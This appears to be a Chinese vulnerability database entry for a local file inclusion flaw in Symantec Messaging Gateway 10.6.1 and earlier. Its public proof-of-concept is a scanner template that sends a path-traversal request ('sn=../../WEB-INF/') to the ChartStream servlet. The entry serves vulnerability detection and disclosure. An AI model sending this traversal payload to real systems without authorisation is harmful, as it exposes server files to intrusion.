symantec-messaging-gateway: Symantec Messaging Gateway <=10.6.1 - Local File Inclusion

日期: 2025-08-01 | 影响软件: Symantec Messaging Gateway | POC: 已公开

漏洞描述

Symantec Messaging Gateway 10.6.1 and prior are vulnerable to local file inclusion.

PoC代码[已公开]

id: symantec-messaging-gateway

info:
  name: Symantec Messaging Gateway <=10.6.1 - Local File Inclusion
  author: Random_Robbie
  severity: high
  description: Symantec Messaging Gateway 10.6.1 and prior are vulnerable to local file inclusion.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,messaging,symantec,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "struts-default.xml"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b359b9beba1c9eec215d53e25cded73bba3204eca03607064401e82354c3118b022100ca0b12f4b11f9405b09eeb219f8641d88f48d8b5cd32fd77f5437972d2a1a1ff:922c64590222798bb761d5b6d8e72950

相关漏洞推荐